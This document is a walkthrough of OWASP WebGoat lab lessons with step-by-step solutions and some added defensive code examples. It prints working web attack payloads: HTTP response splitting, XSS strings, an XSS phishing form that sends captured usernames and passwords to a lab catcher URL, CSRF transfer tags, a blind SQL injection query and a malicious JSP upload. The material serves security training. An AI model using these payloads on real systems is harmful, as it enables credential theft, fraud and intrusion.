OWASP WebGoat:-
First, run WebGoat. If you are using the virtual machine .ova file, open the IP address provided by the virtual machine in your browser,
e.g.:- URL: 192.168.1.26 (it can be different in your case)
General
Http Basics
This tutorial shows you how the HTTP reverse function works.
Enter any name in the input field; the result will be shown reversed in the input field.
E.g.: Aryan = nayrA
HTTP Splitting
This tutorial is divided into 2 stages.
Encode the code given below:-
website:- http://yehg.net/encoding/
On that site, click [encodeURIComponent].
After encoding the code, put it in the input field, then click the 'SEARCH' button.
Stage 1: HTTP Splitting
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 31
<html>White Hat Aryan</html>
Stage 2: Cache Poisoning:-
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Oct 2222 15:27:28 GMT
Content-Length: 31
<html>White Hate Aryan: Cache Poisoning Done</html>
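The two stages above work because a CR/LF pair inside the encoded parameter ends the server's header and starts a second, attacker-written response. The following is an added example (not WebGoat's code) showing the vulnerable header construction beside the server-side check that blocks it; the redirect layout and function names are this example's own assumptions.

```javascript
// Added example (not WebGoat's code): why CR/LF in the 'language' parameter
// splits the response, and the server-side check that blocks it.

// The page's stage-1 payload joined with CRLF, i.e. what the server sees after
// decoding the encodeURIComponent() form the browser sent (constructed sample).
const SPLIT_PAYLOAD = [
  "en",
  "Content-Length: 0",
  "",
  "HTTP/1.1 200 OK",
  "Content-Type: text/html",
  "Content-Length: 31",
  "",
  "<html>White Hat Aryan</html>",
].join("\r\n");

// Vulnerable shape: the decoded parameter is copied straight into a header.
function naiveRedirect(language) {
  return "HTTP/1.1 302 Found\r\nLocation: /WebGoat/attack?language=" +
         language + "\r\n\r\n";
}

// Hardened: refuse any header value carrying CR, LF or other control bytes,
// and re-encode it for the URL. Rejecting (not stripping) keeps the attempt
// visible in the error log.
function safeRedirect(language) {
  if (/[\x00-\x1f\x7f]/.test(language)) {
    throw new Error("header injection attempt: control character in value");
  }
  return "HTTP/1.1 302 Found\r\nLocation: /WebGoat/attack?language=" +
         encodeURIComponent(language) + "\r\n\r\n";
}

// How many HTTP responses a cache or browser would parse out of the bytes.
function countResponses(raw) {
  return (raw.match(/^HTTP\/1\.[01] \d{3}/gm) || []).length;
}

// Round trip: the browser encodes, the servlet container decodes the parameter.
const DECODED = decodeURIComponent(encodeURIComponent(SPLIT_PAYLOAD));
```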
Access Control Flaws
Using an Access Control Matrix
In this tutorial you have to explore every user and find out who is the 'Account Manager'.
Select user:- Larry
Select resource:- Account Manager
Bypass a Path Based Access Control Scheme
Select any file from the select input, open Inspect Element and change the value to
value="../../reportBug.jsp", then click View File.
LAB: Role Based Access Control
Stage 1: Bypass Business Layer Access Control
Login as Tom (password is 'tom').
Then open Burp Suite, start intercepting and click on View.
In Burp Suite, change 'action=ViewProfile' to 'action=DeleteProfile'.
Stage 2: Add Business Layer Access Control
This is the developer version.
Stage 3: Bypass Data Layer Access Control
Login as Tom (password is 'tom'), then click on 'Search Staff' and type any other name,
like Moe (password is 'moe'); then click on Edit Profile, change the content of any field
in the profile and click 'Update Profile'.
Stage 4: Add Data Layer Access Control
This is the developer version.
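The two developer stages ask for the checks that stages 1 and 3 bypass: a business-layer check that the role may invoke the action at all, and a data-layer check that the user may touch the targeted record. The following is an added example (not WebGoat's own code); the role names, permission table and staff records are constructed for illustration and differ from WebGoat's real role table.

```javascript
// Added example (not WebGoat's code) of server-side business- and data-layer
// access control. Roles, permissions and staff records are constructed.

// Business layer: which actions each role may invoke, decided server-side.
const PERMISSIONS = {
  employee: new Set(["ViewProfile", "EditProfile", "UpdateProfile"]),
  manager: new Set(["ViewProfile", "EditProfile", "UpdateProfile",
                    "SearchStaff", "DeleteProfile"]),
};

function roleMayInvoke(role, action) {
  const allowed = PERMISSIONS[role];
  return allowed !== undefined && allowed.has(action);
}

// Data layer: an employee may only touch their own record; a manager may touch
// records in their own department. The rule keys off the session user, never
// off an employee id the client sent.
function mayAccessRecord(user, target) {
  if (user.id === target.id) return true;
  return user.role === "manager" && user.dept === target.dept;
}

// Single gate every 'action' request passes through. Stage 1 (action rewritten
// to DeleteProfile) fails the first check; stage 3 (editing Moe while logged in
// as Tom) fails the second.
function authorize(sessionUser, request, directory) {
  if (!roleMayInvoke(sessionUser.role, request.action)) {
    return { ok: false, reason: "action not permitted for role" };
  }
  const target = directory[request.employeeId];
  if (target === undefined) return { ok: false, reason: "unknown employee" };
  if (!mayAccessRecord(sessionUser, target)) {
    return { ok: false, reason: "record not owned by user" };
  }
  return { ok: true, target: target.name };
}

// Constructed staff directory (ids, roles and departments are made up).
const STAFF = {
  101: { id: 101, name: "Tom", role: "employee", dept: "engineering" },
  102: { id: 102, name: "Moe", role: "employee", dept: "engineering" },
  103: { id: 103, name: "Larry", role: "manager", dept: "engineering" },
};
```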
Remote Admin Access
AJAX Security
Same Origin Policy Protection
Click on the links at the bottom one by one.
Click here to try a Same Origin request:
lessons/Ajax/sameOrigin.jsp
Click here to try a Different Origin request:
http://www.google.com/search?q=aspect+security
LAB: DOM-Based cross-site scripting
STAGE:1 - Copy the image location link, which is shown with the name 'Location: OWASP IMAGE',
and type an HTML image tag, e.g.- <img src="images/logos/owasp.jpg"/>
STAGE:2 - <img src="abc" onerror="alert('done')"/>
STAGE:3 - <iframe src="javascript:alert('done')"></iframe>
STAGE:4 - Copy the fake login page and paste it in the input field, then enter any password in the input field.
STAGE:5 -
LAB: Client Side Filtering
STAGE:1 - Right click on the select user [Choose Employee] field, then click on Inspect Element.
Then find the hidden table 'hiddenEmployeeRecords' and expand the HTML tables:
>table >div >table >tbody >tr. Find Neville's salary:
Salary 450000
Then answer the question (Neville's salary is 450000) and click Submit Answer.
STAGE:2 -
DOM Injection
Right click on 'Activate!', then delete disabled="" and click on the Activate! button.
XML Injection
Enter account ID 836239 in the input field; some rewards will be shown below. Right click on any reward and
JSON Injection
In this tutorial you have to buy the NON STOP ticket. There are two tickets available:
1 is NON STOP $600
2 is TWO STOPS $300
Now you have to buy the NON STOP ticket at the cheaper price.
Right click on $600, change the price from $600 to $300, then click on the 'SUBMIT' button.
Silent Transactions Attacks
Enter this JavaScript code in the URL bar and press Enter.
javascript:submitData(132,4444444444444444);
Dangerous Use of Eval
Enter this code in the input 'Enter your three digit access code:'
123');alert(document.cookie);('
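The input above works because the lesson page wraps the access code in a JavaScript string and passes the whole statement to eval(). The following is an added example, not WebGoat's code: the statement shape is a reconstruction of that pattern, with new Function standing in for eval() so it runs outside a browser, followed by the handler that validates the code instead of evaluating it.

```javascript
// Added example (not WebGoat's code). Vulnerable shape: the access code is
// spliced into a statement and executed. The statement text is a
// reconstruction of the lesson's pattern, not its source.
function runNaive(code, document, alert) {
  const statement = "document.forms[0].access.value = ('" + code + "');";
  // new Function plays the role of eval() so the example runs under Node.
  new Function("document", "alert", statement)(document, alert);
}

// Hardened handler: never evaluate user input as code. Check the shape, then
// assign the value with an ordinary statement.
function handleAccessCode(code, document) {
  if (!/^\d{3}$/.test(code)) {
    return { ok: false, error: "access code must be exactly three digits" };
  }
  document.forms[0].access.value = code;
  return { ok: true, code: Number(code) };
}

// Constructed stand-ins for the browser objects the lesson page touches.
function makeDocument() {
  return {
    cookie: "JSESSIONID=constructed-value",
    forms: [{ access: { value: "" } }],
  };
}
```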
Insecure Client Storage
STAGE:1 - Right click anywhere on your browser page, open the source code and find 'javascript/clientSideValidation.js'.
Then click javascript/clientSideValidation.js to open it.
Once clientSideValidation.js is open you will see some "coupons" and some functions defined
in this file,
like:- isValidCoupon(coupon) and decrypt(code).
The coupons are stored as encrypted values; you have to decrypt any coupon with the 'decrypt(code)' function
which is defined in the
clientSideValidation.js file.
Enter this code in the URL bar:
javascript:alert(decrypt("emph"));
It will show you the decrypted value of the 'emph' coupon, which is GOLD.
Enter GOLD in the input field "Enter your coupon code", then click [Purchase].
STAGE:2 - Enter a quantity for all the products. Now you have to change the value of the total amount.
Right click on the total amount value, like '$998.98', change the value from $998.98 to $0, then click Purchase.
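The JSON Injection lesson and both Insecure Client Storage stages share one root cause: the price, the total and the coupon check live in the browser, where the user can edit them. The following is an added example (not WebGoat's code) of the server-side pricing that closes all three; the catalog prices, the coupon table and the order field names are constructed for this example.

```javascript
// Added example (not WebGoat's code): recompute every money value on the
// server from a catalog and ignore whatever the client sent for them.
const TICKET_PRICES = { "NON STOP": 600, "TWO STOPS": 300 };  // constructed
// Server-side coupon table: code -> discount fraction. The client-side
// decrypt()/isValidCoupon() of the lesson has no say here.
const COUPONS = { GOLD: 0.25 };  // constructed

// order: what the browser POSTed. Only ticket, quantity and coupon are read;
// any 'price' or 'total' fields are deliberately ignored.
function priceOrder(order) {
  const unit = TICKET_PRICES[order.ticket];
  if (unit === undefined) return { ok: false, error: "unknown ticket" };
  if (!Number.isInteger(order.quantity) || order.quantity <= 0) {
    return { ok: false, error: "quantity must be a positive integer" };
  }
  let total = unit * order.quantity;
  let discount = 0;
  if (order.coupon !== undefined) {
    const rate = COUPONS[String(order.coupon).toUpperCase()];
    if (rate === undefined) return { ok: false, error: "invalid coupon" };
    discount = total * rate;
    total -= discount;
  }
  // Detection hook: a client-supplied total that disagrees with ours is a
  // tampering signal worth logging, even though it never affects the charge.
  const tampered = order.total !== undefined && Number(order.total) !== total;
  return { ok: true, unit, quantity: order.quantity, discount, total, tampered };
}
```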
Authentication Flaws
Password Strength
This tutorial shows you how much time you would need to break a given password.
Copy the passwords one by one and check the password strength using Google.
e.g.:- 123456 = 1 second
abzfez = 1 second
a9z1ez = some minutes
aB8fEz = some hours
z8!E?7 = some days
It depends on your device's performance.
Forgot Password
You have to reset the admin's password.
Enter user name = 'admin' and answer the secret question:
What is your fav color?
Now you have to brute force it using Burp Suite, or you can try multiple logins manually.
Mainly we have seven colors, so brute force those using Burp Suite.
The answer is 'green'.
Basic Authentication
What is the name of the authentication header: = Authorization
What is the decoded value of the authentication header: = root:owaspbwa or webgoat:webgoat
Multi Level Login 2
Login as Joe (password is banana), then start intercepting with Burp Suite and enter TAN #1 15161.
Then change hidden_user=Joe to hidden_user=Jane and click Forward.
Multi Level Login 1
STAGE:1 - Login as Jane (password is tarzan).
STAGE:2 - Log out of the session and log in again as Jane (password is tarzan). Now start intercepting,
enter TAN #2 15648, then change hidden_tan=2 to hidden_tan=1 in Burp Suite and click Forward.
Buffer Overflows
Off-by-One Overflows
Type any name in First Name and Last Name, enter approx. 4100 characters in the Room No. field, then click Submit.
It will then show you Available Price Plans: simply click on Accept Terms. Done!
Code Quality
Discover Clues in the HTML
Right click anywhere on your browser page and open the source code; there you have to find some credentials,
like a user name and password.
Developers sometimes leave credentials in the HTML inside a comment:
<!-- FIXME admin:adminpw --><!-- Use Admin to regenerate database -->
Enter the user name and password, then click Login.
Concurrency
Thread Safety Problems
In this tutorial you have to use two browsers: open two browsers and open Concurrency > Thread Safety Problems
in both. Now in the first browser enter the user name 'jeff', and in the second browser enter the user name 'dave'.
Now click Submit in both browsers at the same time.
Shopping Cart Concurrency Flaw
In the first browser, enter Quantity 1 in the first field, which is $169, click Update Cart and then click Purchase.
After clicking Purchase, in the second browser enter Quantity 1 in the third field, which is $1799, then click Update Cart.
Now in the first browser click Confirm.
Cross-Site Scripting (XSS)
Phishing with XSS
Put the form given below in the input field and click Search.
After this, a login and password form will appear below the search bar.
Enter a user name and password and click Submit; when the Submit button is clicked a function named hack()
runs and shows a popup with your login credentials in the alert.
<script>
function hack(){
// show the captured form values, then send them to WebGoat's catcher as an image request
alert("Login="+document.forms[0].user.value
+ "Password="+document.forms[0].pass.value);
XSSImage=new Image;
XSSImage.src="http://192.168.1.28/WebGoat/catcher?PROPERTY=yes"
+"&user="+document.forms[0].user.value
+"&password="+document.forms[0].pass.value;
}
</script>
<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><HR>
LAB: Cross Site Scripting
Stage 1: Stored XSS
Login as Tom and click on ViewProfile, then click on EditProfile.
Put the JavaScript alert code '<script>alert("Hacked by WhiteHatAryan");</script>' in the Street field and click on UpdateProfile; when you click UpdateProfile an alert runs.
After this, log out and log in with the 'jerry' profile, then click ViewProfile; if the alert is called again, that means jerry is affected by the stored XSS attack.
Stage 2: Block Stored XSS using Input Validation
For Developer
Stage 3: Stored XSS Revisited
Login as Bruce and click on ViewProfile.
Stage 4: Block Stored XSS using Output Encoding
For Developer
Stage 5: Reflected XSS
Login as 'Larry', click on SearchStaff, then enter the JavaScript code.
<script>alert("Hacked by WhiteHatAryan");</script>
Stage 6: Block Reflected XSS
For Developer
Stored XSS Attacks
Put anything as the title, enter '<script>alert("Hacked by WhiteHatAryan");</script>' in the message field, then click on Submit. The title will appear in the message list as a link; click on it and if the alert is called, that means the page is affected by the stored XSS attack.
Reflected XSS Attacks
Enter the JavaScript code in 'Enter your three digit access code:'
<script>alert("Hacked by WhiteHatAryan");</script>
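The developer stages of the XSS lab (block stored XSS with input validation, block it with output encoding) and the stored/reflected lessons above all come down to two controls. The following is an added example (not WebGoat's code) showing both against the page's own alert payload; the street address pattern and the row renderer are this example's assumptions.

```javascript
// Added example (not WebGoat's code): a whitelist check on the way in
// (stage 2) and HTML entity encoding on the way out (stage 4).
const ALERT_PAYLOAD = '<script>alert("Hacked by WhiteHatAryan");</script>';  // the page's payload

// Stage 2 style input validation: a street address has no business containing
// angle brackets, quotes or semicolons. Reject, do not strip. The pattern is
// an assumption of this example.
const STREET_RE = /^[A-Za-z0-9 .,#'\/-]{1,80}$/;
function validateStreet(value) {
  return STREET_RE.test(value);
}

// Stage 4 style output encoding: encode the five characters HTML cares about
// so stored text renders as text, whatever it contains.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a profile row the way a JSP would; user data reaches the page only
// through escapeHtml().
function renderProfileRow(label, value) {
  return "<tr><td>" + escapeHtml(label) + "</td><td>" + escapeHtml(value) + "</td></tr>";
}

// Quick detection check on rendered output: does a live <script> tag survive?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```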
Cross Site Request Forgery (CSRF)
Enter any title in the title field, then enter the code given below in the message field and click Submit.
<img src="http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000" width="1" height="1" />
Or, if it's not working, you can use it directly as a URL,
e.g.:- http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000
NOTE-
CSRF Prompt By-Pass
Enter any title in the title field, then enter the code given below in the message field and click Submit.
<img src="http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000&transferFunds=CONFIRM" width="1" height="1" />
Or, if it's not working, you can use it directly as a URL,
e.g.:- http://192.168.42.83/WebGoat/attack?Screen=52&menu=900&transferFunds=6000&transferFunds=CONFIRM
NOTE-
CSRF Token By-Pass
HTTPOnly Test
Cross Site Tracing (XST) Attacks
Improper Error Handling
Fail Open Authentication Scheme
Injection Flaws
Command Injection
Numeric SQL Injection
Log Spoofing
XPATH Injection
String SQL Injection
LAB: SQL Injection
Stage 1: String SQL Injection
Stage 2: Parameterized Query #1
Stage 3: Numeric SQL Injection
Stage 4: Parameterized Query #2
Modify Data with SQL Injection
Add Data with SQL Injection
Database Backdoors
Blind Numeric SQL Injection
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 1000 );
Blind String SQL Injection
Denial of Service
Denial of Service from Multiple Logins
Insecure Communication
Insecure Login
Insecure Configuration
Forced Browsing
Insecure Storage
Encoding Basics
Malicious Execution
Malicious File Execution
First save the code below in a file with the .jsp extension.
<HTML> <% java.io.File file = new java.io.File("/var/lib/tomcat6/webapps/WebGoat/mfe_target/root.txt"); file.createNewFile(); %> </HTML>
Now click Browse and select the .jsp file you saved, e.g. hack.jsp.
Then click Start Upload, right click on your uploaded image and copy the image link,
open a new tab in your browser, enter the link and press Enter, then refresh your WebGoat tab.
Parameter Tampering
Bypass HTML Field Restrictions
First right click on the 'Disabled input field', click on Inspect Element and delete the disabled="" attribute of the input field.
After this open Burp Suite and start intercepting, then enter any word in the (formerly) disabled input field and click Submit,
then change all the values in Burp Suite,
e.g.- select=foo&radio=foo&checkbox=on&shortinput=12345&disabledinput=disabled+any+word&SUBMIT=Submit TO
select=fooooo&radio=foooo&checkbox=off&shortinput=123456789&disabledinput=disabledanyword&SUBMIT=Submit2
Exploit Hidden Fields
Start Burp Suite and intercept, click on Purchase and change the price in Burp Suite.
Exploit Unchecked Email
1- Enter the JavaScript alert code in the comment box: <script>alert('White hat aryan');</script>
2- Start Burp Suite and intercept, then enter the JavaScript code in the comment box, <script>alert('White hat aryan');</script>, and change admin to guest.
Bypass Client Side JavaScript Validation
Session Management Flaws
Hijack a Session
Spoof an Authentication Cookie
Session Fixation
Web Services
Create a SOAP Request
WSDL Scanning
Web Service SAX Injection
Web Service SQL Injection
Admin Functions
Report Card
Summary Report Card
Refresh Database
User Information
Product Information
Adhoc Query
Challenge
The CHALLENGE!